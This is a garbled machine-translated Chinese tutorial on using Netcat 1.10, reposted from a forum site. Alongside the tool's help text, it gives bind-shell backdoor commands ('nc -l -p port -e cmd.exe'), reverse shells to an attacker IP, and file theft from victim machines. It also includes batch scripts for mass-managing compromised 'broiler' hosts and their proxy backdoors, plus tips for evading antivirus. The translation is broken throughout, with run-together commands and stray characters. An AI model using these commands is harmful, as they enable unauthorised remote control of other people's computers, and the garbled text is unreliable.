Netcat 1.10 use

xiaoxiao2021-03-06 63

Netcat 1.10 use

0. Written in front 1. NETCAT 1.10 for NT - NC11NT.zip, Original English Information 2. Netcat 1.10 for NT Help Information 3. Netcat 1.10 Commonly used command format 4. Manage broiler, change the broiler setting 5. Download 6. postscript

* Outbound or inbound connections, TCP or UDP, to or from any ports * Full DNS forward / reverse checking, with appropriate warnings * Ability to use any local source port * Ability to use any locally-configured network source address * Built-in port -scanning capabilities, with randomizer * Can read command line arguments from standard inputb * Slow-send mode, one line every N seconds * Hex dump of transmitted and received data * Ability to let another program service establishedconnections * Telnet-options responder

New for nt

* Ability to run in the background without a console window * Ability to restart as a single-threaded server to handle a newconnection________________________________________________________________________Some of the features of netcat are:

Outbound or inbound connections, TCP or UDP, to or from any ports Full DNS forward / reverse checking, with appropriate warnings Ability to use any local source port Ability to use any locally-configured network source address Built-in port-scanning capabilities, with randomizer Built-in loose source-routing capability Can read command line arguments from standard input Slow-send mode, one line every N seconds Optional ability to let another program service inbound connectionsSome of the potential uses of netcat:

Script backends Scanning ports and inventorying services Backup handlers File transfers Server testing and simulation Firewall testing Proxy gatewaying Network performance testing Address spoofing tests Protecting X servers 1001 other uses you`ll likely come up with

Netcat Encryption = Cryptcat

Compare Win2000 Microsoft Telnet.exe and Microsoft's TLNTSVR.EXE service, you can see it when you connect. 1. Nc.exe is a non-standard Telnet client program, 1.2 There is also a PuTty.exe client program, provided Four connection modes --Raw -Telnet -Rlogin -SSH.

######################################################################################################################################################################################################################################################################################################## ############# 2. Netcat 1.10 for NT Help information ####################### ################################## C: / Windows / Desktop> NC -H [V1.10 NT] Connect To Somewhere: NC [-Options] Hostname Port [S] [Ports] ... Listen for Inbound: nc -l -p port [options] [Hostname] [port] options: -d detach from console, Background Mode - E Prog Inbound Program To EXEC [Dangerous !!] - g Gateway Source-Routing Hop Point [S], Up to 8-g Num Source-Routing Pointer: 4, 8, 12, ...- h this cruft - 帖子帖子帖子帖子帖子帖子帖子帖子米 l -L Listen Harder, Re-Listen On Socket Close (Continue to monitor) - Numeric-Only IP Addresses, NO DNS (IP Digital Mode, Non DNS Analysis) -O File Hex Dump of Traffic (Hex Mode output file, three segments) -P port local port number (local port) -r randomize local and remove ports (Random Local Remote Port) -s Addr Local Source Address (local source address) -t Answer Telnet Negotiation-UDP Mode-V verbose [use twice to be more verbose] (-VV more letter Interest) -w Secs Timeout for Connects and final net reads-z zero-I / o mode [use for scanning] (scan mode, -vv) Port number can be indeividual or ranges: mn [inclusive] ###### ######################################################################################################################################################################################################################################################################################################## ############### 3. Netcat 1.10 common command format ############################# ######################################################################## Part of the 15th of the article "part of the article.

3.1. Spectacle of ports: NC -VV IP PORTRIVER [192.168.0.198] 19190 (?) Open // Display whether to open Open3.2. Scanner NC -VV -W 5 ip port-port portnc -vv -z ip port- Port Port This scan will leave a lot of traces, and the system administrator will be careful.

3.3. Back door Victim Machine: // Victim machine Nc -L -P port -e cmd.exe // Win2000nc -l -P port -e / bin / sh // UNIX, Linuxattacker machine: // attacker machine .nc ip -p port // Connect Victim_ip, then get a shell.

3.4. Reverse connection Attacker Machine: // General is SQL2.exe, remote overflow, webdavx3.exe attack .// or Wollf's reverse connection .nc -vv -l -p port Victim Machine: nc -e cmd.exe Attacker ip -p portnc -e / bin / sh attacker ip -p port or: attacker machine: nc -vv -l -p port1 / * is used to input * / nc -vv -l -p prot2 / * for display * / VICTIM MACHINE: NC Attacker_ip Port1 | Cmd.exe | NC Attacker_ip Port2nc Attacker_ip Port1 | / Bin / SH | NC Attacker_ip Port2

139 To add parameters - S (nc.exe -l -p 139 -d -e cmd.exe -s each other machine IP) This will ensure that nc.exe takes precedence over NetBIOS.

3.5. Transfer file: 3.5.1 Attacker Machine <- Victim Machine // Back from broiler DC .nc -d -l -p port path / file.txt / * Victim Machine * / Need Ctrl C Exit // brokens Requires the cmd.exe of the GUI interface (terminal login, it is better to install FTP is convenient). Otherwise, there is no way to enter CRL C.

3.5.2 Attacker Machine -> Victim machine // Upload command file to broiler nc -vv -l -p port> Path / file.txt / * Victim machine * / Need Ctrl C Exit NC-D Victim_ip port

Conclusion: You can transfer ASCII, bin files. You can transfer program files.

Question: After connecting an IP, after the transfer is complete, you need to send Ctrl C to exit nc.exe. Or only again to use pskill.exe to kill the process. But if you release the handle of the transfer file open?

3.6 port data capture package. Nc -VV-W 2 -o test.txt www.xfocus.net 80 21-15

<00000058 35 30 20 53 79 6e 74 61 78 20 65 72 72 6F 72 # 500 Syntax Error <00000068 2C 20 63 6F 6D 6D 61 6E 64 20 22 22 20 75 6e 72 #, command "" unr <00000078 65 63 6F 67 6e 69 7a 65 64 2e 0d 0a # ecognized ... <0000000084 83 00 00 01 8F # .....

3.7 Telnet, automatic batch. ★★★★★ I have to focus on the recommended thing is this .nc Victim_ip port

NC-D Victim_ip port

_______________ file.cmd ________________________ passwordcd% windir% echo [] = [% windir%] c: cd / md testcd / d% windir% / system32 / net stop sksockserversnake.exe -config port 11111net start sksockserverexit _______________ file.cmd__END ___________________ ######## ######################################################################################################################################################################################################################################################################################################## ############ 4. Manage broiler, change broiler setting #################################################################################################################################################################################################################################################### ################################### 4.1 For example to unify the proxy port above the broiler . Snake.exe Modified to 11111 Service Name "SKSOCKSERVER" using Winshell back door. Port 1234 password password command format is modi.bat youip.txt

___________modi.bat_________________________________________________________________________________________________________________

: start @ echo password> a.cmd@echo s >> a.cmd@echo cd / d %% windir %% / system32 / >> a.cmd@net stop "SksockServer" >> a.cmd@snake.exe -config port 11111 >> a.cmd@net start "sksockserver" >> a.cmd@exit >> a.cmd

: auto @ for / f "eol =; tokens = 1, 2" %% I in (% 1) do @ (nc.exe -vv -w 3 %% i 1234

: END ___________ modi.bat__end ______________________

4.2

@eclsc: / nc -vv -w 3 -l -p 80 >> 80.txtGoto Start Runs the firewall after running this batch, listens to many probing U vulnerabilities, most of them are three sets - Nimda virus scans you. This will get broiler. Although the quality is not high. But it is also a cheap approach.

Brochure characteristics: 1. Unicode Vulnerability 2. The Guest password is empty, and the Administrators group user 3. Other vulnerabilities

Let's go slowly. However, once again, it is not recommended and cannot undermine the domestic host, and the TFTP.exe will be renamed later. Then dry off the MMC.exe process with pskill, followed by anti-virus. After doing a good job, deactivate the Guest account to deal with the fool scanner

5.2 http://www.xfocus.net/download.php?id=320 Name: cryptcat_nt.zip Updated: 2002-04-05 Category: Network Tools Platform: Win9x / NT / 2000 Size: 115.8K submit: maxilaw Profile : Encrypted NC.

5.3 http://content.443.ch/pub/security/blackhat/pub/security/blackhat/neetworking/nc/ Foreign website 10.03.02 15:48 1305 cryptcat.txt10.03.02 15:48 245760 cryptcat_linux2.tar10.03.02 15:48 118533 Cryptcat_NT .zip

Only tomorrow is online, find a Win2000 Server landing terminal service to test. I still break WIN98, there is no way.

Try more, think more, maybe you can use it to do more - You can see those scripts in the spript directory in nc110.tgz, and get some ideas. I have no NC110.tgz compression package here. Go to Google.com tomorrow. The command below Unix is still unfamiliar.

转载请注明原文地址:https://www.9cbs.com/read-118805.html

9cbs

New Post(0)